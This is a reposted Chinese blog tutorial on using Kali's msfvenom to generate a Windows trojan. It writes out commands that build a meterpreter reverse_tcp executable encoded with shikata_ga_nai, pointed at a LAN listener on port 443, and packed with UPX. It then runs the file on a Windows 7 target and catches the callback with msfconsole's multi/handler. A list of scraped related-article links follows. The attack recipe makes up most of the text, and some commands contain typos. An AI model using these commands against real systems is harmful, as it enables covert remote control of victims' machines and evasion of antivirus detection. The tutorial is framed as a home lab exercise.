msfvenom
来源:互联网 发布:汽车保值率怎么算法 编辑:程序博客网 时间:2024/06/05 07:20
摘要
在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以该博文记录一些关于msfvenom使用技巧。
msfvenom
:>>>
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.
- 目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.
- 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.
- 工具:MSF.
0x00
开启:postgresql
root@kali:~# service postgresql start
查看帮助
命令:
root# msfvenom -h
部分参数:>>>
-p 选择一个载荷[payload],或者说一个模块吧。-l 载荷列表-f 生成的文件格式-e 编码方式-i 编码次数-b 在生成的程序中避免出现的值-h 帮助-f exe 生成EXE格式LHOST,LPORT 监听上线的主机IP和端口
文件格式:>>>
不同的平台需要的不同,来看看支持生成的格式
root@kali:~# msfvenom --help-formatsError: Executable formats asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, warTransform formats bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
过程
2、生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数
命令:>>>
root# msfvenom -p windows/meterpreter/reverse_tcp -o
3、现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口
命令: >>>
root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
4、upx加壳:>>>
upx -5 /root/Desktop/acn.exe
4、把生成的abc.exe放到win7下.执行.
5、在命令行下,打开msfconsole.
命令:>>>
root # msfconsole
6、本机监听,因为之前用的是reverse_tcp,所以设置如下
命令: >>>
msf > use exploit/multi/handlerMsf exploit(handler) > set payload windows/meterpreter/reverset_tcp
生成一个程序的过程
[http://www.jianshu.com/p/8d3f94390eab]
阅读全文
0 0
- msfvenom
- msfvenom
- msfvenom
- msfvenom参数
- msfvenom反弹
- msfvenom / ndisasm - disass shellcode
- msfvenom参数详解
- 利用msfvenom生成木马程序
- 利用msfvenom生成木马程序
- 利用msfvenom渗透win7
- msfvenom的使用
- msfvenom生成shellcode
- msfvenom 生成shellcode
- msfvenom生成各类Payload命令
- TheFatRat:Msfvenom傻瓜化后门生成工具
- Android Hack---使用msfvenom之基础篇
- metasploit中msfvenom命令解释说明
- Metasploit应用笔记-msfvenom生成meterpreter后门代码
- SCUT Training 20170920 Problem L
- Python3常用内置函数
- android studio 如何调用aar
- form表单输入框JS校验
- Code-First 数据迁移
- msfvenom
- 你所不知道的Python奇技淫巧
- 七层网络模型
- Java上机心得1
- Ubuntu 17.10 “Artful Aardvark” 发布首个 Beta
- Java常见缺陷模式
- 校门外的树
- 数学中的常见符号
- Python魔术方法详解